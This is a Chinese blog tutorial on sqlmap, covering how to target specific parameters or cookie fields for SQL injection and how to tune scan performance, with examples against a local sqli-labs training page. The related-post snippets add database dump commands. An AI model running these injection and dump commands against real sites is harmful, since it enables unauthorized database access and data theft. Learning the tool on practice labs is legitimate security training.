注入工具 -- sqlmap(指定位置注入和优化性能)

最新推荐文章于 2024-05-11 11:25:13 发布
最新推荐文章于 2024-05-11 11:25:13 发布
阅读量1.2k 收藏
点赞数
分类专栏: web安全工具库 文章标签: 注入工具 sqlmap 指定位置注入 优化性能
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41489908/article/details/103708781
版权

一、指定位置注入

1、-p,指定具体探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1 -p id --dbs 对id进行探测

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 -p “id,name” --dbs 对id和name都进行探测

2、–skip,忽略探测的参数

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2 --level 5 --skip host --dbs 5级对所有存在的注入点进行探测,这里忽略了host

3、–param-exclude,忽略包含具体内容的参数

–param-exclude=“id|name”

4、–skip-static 忽略非动态参数
5、用“*”指定注入位置,

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1*&&name=2*&&tab=3 --dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie=“un=adm*;pw=adm”–dbs

sqlmap -u http://192.168.1.121/sqli/Less-1/?id=1&&name=2&&tab=3 --cookie="*"–dbs

二、优化性能

1、设置连接为持久连接

http报文中设置Connection:Keep-Alive
sqlmap中加参数 --keep-alive

2、设置不接受http当中的body,常用在盲注

–null-connection

3、设置多线程

–thread 默认是1个线程,最大线程为10

4、预测输出

–predict-output,不能与thread同时用

5、开启所有优化

-o

禁止非法,后果自负
欢迎关注公众号:web安全工具库

在这里插入图片描述

web安全工具库
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap是一款强大的自动化工具,专门用于检测和利用SQL注入漏洞。它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。...
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
 sql注入sqlmap使用
m0_71866532的博客
03-23 2843
其中参数“-T”用于指定表名称,“--columns”参数用于指定列出表中字段。#其中参数“-D”用于指定数据库名称,“--tables”参数用于列举表。#其中参数“-C”用于指定字段名称,参数“—dump”用于导出数据。#其中“-r”参数用于指定注入的导出流量包的绝对路经文件。#,其中参数“--dbs”用于列举数据库。”参数用于指定列出表中字段。”用于指定字段名称,参数“”用于指定数据库名称,“1.打开sqlmap。”用于指定表名称,“
sqlmap之sql注入(一)
m0_55313512的博客
02-27 5645
SQL注入(一)
最全漏洞扫描工具 -- awvs13,2024年最新细谈分布式事务的前世今生
最新发布
2401_84563561的博客
05-11 312
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!我羡慕那些又帅又有钱的男生,他们拥有过很多女孩的青春,而我,只能拼命赚钱,才能拥有一个爱过别人的姑娘。。。。awvs是一款知名的Web网络漏洞扫描工具,它通过网络爬
sqlmap学习(八)指定位置注入
rane的博客
03-26 1万+
1、sqlmap设置指定注入参数 -p:指定参数进行扫描,不是扫描所有参数,这样可以避免浪费时间到非注入参数上,从而提高扫描效率。 python sqlmap.py -u "url" -p "id,user-agent" --skip跳过指定参数扫描,和-p作用相反,它用来跳过需要扫描的参数。 python sqlmap.py -u "url" --skip "id,user-agent" ...
SQLMAP注入参数-其他参数介绍
分享学习网络的点点滴滴
08-15 1026
指定扫描的参数,使–level失效1-5级(默认1)/usr/share/sqlmap/xml/payloads 查看不同级别下发送不同的payload。
sql注入知识----sqlmap常用参数
尘玥的故事
01-23 985
在知道注入在哪里时通过' * '进行测试 工具会识别' * '并在这里测试数据库常用 urrent-db //查看当前的数据库passwords //查看所有密码batch 按照软件默认设置,自动回答start x1 --stop x2 输出从x1到x2的啥啥啥参数:–answers参数:--threads-dbs 列出所有数据库current-db 获取当前数据库名称tables -D “ ” 获取指定数据库中的表 columns -T “4” -D “3”获取数据库3中的4表的所有字段(列名
第九节 Sqlmap注入位置介绍-01
09-15
Sqlmap 提供了多种方式来指定注入参数,例如: * -p 选项:指定探测的参数,例如:-p “id,user-agent” * --skip 选项:忽略探测具体的参数,例如:--level --skip “user-agent,referer” * --param-exclude 选项...
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
根据提供的文件名`sqlmapproject-sqlmap-99f07b6`,这可能是一个包含源代码或特定构建的版本。 2. 目标检测:使用`sqlmap -u URL`命令检测目标URL是否存在SQL注入漏洞。 3. 漏洞确认:通过`sqlmap --dbs`列出所有可...
第八节 Sqlmap性能优化-01
09-15
Sqlmap是一款功能强大且广泛应用的SQL注入工具,但是在实际使用中,Sqlmap性能优化变得非常重要。这是因为Sqlmap的扫描速度直接影响到注入结果的准确性和效率。因此,本节课程将详细介绍Sqlmap性能优化的四个方面...
SQL注入详解(包含SQLMap用法)
Zyu0
12-07 3811
这个系列讲的是整个SQL注入流程,其中包含各种手工注入姿势、SQLmap自动化注入及安全防护绕过姿势详解,现在只完成了其中一部分内容,每天都会更新,感兴趣的可以持续关注一下~
SQLmap参数详解
Williamanddog的博客
01-19 5519
目标URL参数:-u或者--url 格式:http(s)://targeturl[:port]/[…] 例如:python sqlmap.py -u "从Burp或者WebScarab代理中获取日志 参数:-l 可以直接吧Burp proxy或者WebScarab proxy中的日志直接导出来交给sqlmap来一个一个检测是否有 注入。 从文本中获取多个目标扫描 参数:-m 文件中保存url,sqlmap会一个一个检测 从文件中加载HTTP请求 参数:-r。
使用SQLmap进行注入流程
weixin_62715196的博客
08-10 2693
主要讲述SQLmap的主要功能以及对单个目标如何进行注入
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
SQLMap 渗透工具详细讲解
ju7ran的博客
05-11 1662
我们在学习 SQLMap 的时候,可以根据官网的介绍来了解 SQLMap 的功能。官网地址:https://sqlmap.org/进入官网,我们可以看到这张图片,类似一个小针头的图标,可能为了表达我是 SQL 注入……根据官网的介绍,我们可以了解到 SQLMap,是一种开源渗透测试工具,它可以自动化检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。
sqlmap注入教程 常用指令
qq_58000413的博客
06-29 1863
sqlmap一些指令
1.21 SQLmap工具使用
挚爱凝华的博客
02-09 1248
设置sqlmap线程(扫描速率,范围1-10) --thread kali端 1.判断网站是否存在注入 get类型sqlmap -u "url">检测url中是否存在注入,如果没有注入则运行不出来 post类型sqlmap -r 请求数据包.txt> 使用抓到的数据包文本进行检测注入 2.爆出数据库 爆出当前数据库sqlmap -u "url" --current-db --thread 10 >使用10线程 爆出网站内所有数据库sqlmap -u "ur
sqlmap常见注入方式和基本注入语句
qq_58317810的博客
04-30 2912
sqlmap的get注入方式(以sqli_lables靶场题目为例) (--batch:要求所有数据都选取默认值) sqlmap -u "http://192.168.31.56/Less-1/?id=1" --dbs --batch(探测库名) sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D security --tables --batch(探测表名) sqlmap -u "http://192.168.31.56/Less-1/?id=1" -D se
sqlmap注入怎么找
07-28
根据引用\[1\]和引用\[2\]的内容,可以得出一些关于使用sqlmap寻找注入的方法。首先,可以使用命令"sqlmap.py -r +文件名 -dbs"来获取数据库名称。然后,使用命令"sqlmap.py -r +文件名 -D +数据库名 --tables"来获取表名。接下来,使用命令"sqlmap.py -r +文件名 -D +数据库名 -T +表名 --columns"来获取字段名。最后,使用命令"sqlmap.py -r +文件名 -D +数据库名 -T +表名 -C +字段名 --dump"来获取字段内容。如果在这些步骤中找不到注入,可以尝试在站的搜索栏、留言版、登录/注册页面等交互进行寻找。此外,还可以观察URL地址中是否存在类似于"index.php?id=1"的参数,这种情况下很可能存在注入。\[1\]\[2\]\[3\] #### 引用[.reference_title] - *1* [sqlmap注入实战(三)](https://blog.csdn.net/inslight/article/details/108685126)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [SQL注入注入找法](https://blog.csdn.net/weixin_51519028/article/details/125857734)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insertT0,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值